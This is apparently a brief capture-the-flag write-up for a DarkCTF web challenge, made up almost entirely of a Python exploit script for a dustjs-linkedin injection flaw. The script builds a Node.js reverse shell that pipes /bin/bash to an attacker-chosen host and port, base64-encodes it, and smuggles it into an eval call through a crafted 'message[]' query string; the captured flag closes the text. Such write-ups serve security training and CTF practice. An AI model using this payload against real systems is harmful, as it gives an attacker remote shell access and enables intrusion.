Tags: dustjs web
Rating: 2.0
```py
# dustjs-linkedin vulnerability
import requests
import base64
url = lambda x: "http://dusty.darkarmy.xyz/addNotes?" + x
host = 'yourhost'
port = 8000 # yourport
payload = (f"""
var net = require('net'), sh = require('child_process').exec('/bin/bash');
var client = new net.Socket();
client.connect({port}, '{host}',
""" +
"""function () {
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
""").replace('\n', '').encode()
payload = base64.b64encode(payload).decode()
payload = f'message[]=x&message[]=y%27-eval(new%20Buffer(%22{payload}%22,%20%22base64%22).toString())-%27'
print(url(payload))
# Visit on browser
# darkCTF{n0d3js_l1br4r13s_go3s_brrrr!}
```
